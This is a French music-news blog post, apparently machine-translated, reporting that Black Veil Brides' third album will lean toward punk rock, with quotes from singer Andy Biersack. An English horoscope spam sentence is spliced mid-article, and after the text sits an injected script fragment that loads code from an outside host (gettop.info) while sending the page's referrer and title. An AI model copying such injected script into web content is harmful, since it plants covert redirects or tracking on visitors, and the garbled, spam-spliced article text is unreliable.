Black Veil Brides troisième album en route et se sera du Punk Rock!


Facebooktwitterredditpinterestlinkedinmail

Le punk rock a une histoire riche comme une base puissante qui a changé l »état de la musique rock pour toujours. Que ce soit, Iggy Pop et les légendaires Stooges, CBGB et de la scène de New York city qui été à ce moment là dirigé alors par les Ramones, l »invasion punk britannique des tout puissants Sex Pistols, ou les Hollywood rockers punks de Black Veil Brides, a enrichi la … attendez une minute … je viens de vous dire Black Veil Brides? En fait, la réponse est oui, alors que le groupe a récemment déclaré que leur prochain album « va être un album de punk rock. »

Black Veil Brides a été enregistrer avec de nombreux labels – glam rock des années 80, metalcore, post-hardcore, ainsi que de nombreux mots qui ont été criminalisés par la FCC -, mais le groupe n »a certainement jamais marqué comme le punk rock. Selon le chanteur Andy BVB Biersack, le suivi de I spotted something on Facebook the other taurus love horoscope that caused a parenting flashback. 2011, l »album du groupe, « World’s on Fire » sera perfusé avec un son punk rock.

« Nous avons trois chansons de terminées, » dit Biersack NME. « Nous nous sommes fixé une date limite pour la fin du mois d »août pour le terminer. Nous avons de 20 à 25 chansons écrites et nous sommes maintenant processus de triage. Il va y avoir plus d »un dossier de punk rock que tout ce que nous avons fait auparavant. Il a de Social Distortion rencontre Metallica.  » Biersack a également parlé de la pointe de la popularité du groupe a connu depuis 2011. « Notre trajectoire de carrière a été comme une fusée. Nous sommes venus ici pour quelques centimes l »année dernière quand nous n »avons même pas avoir un dossier sur. Nous ne jouait parce télécharger et Copping Andy a cru en nous.  » Black Veil Brides prévoit un communiqué de presse d »ici Octobre pour leur troisième album à venir..

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous En entrevue The Agonist
Next Green Day nous présente un Trailer et dévoile la pochette de l'album à venir '¡Uno!

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *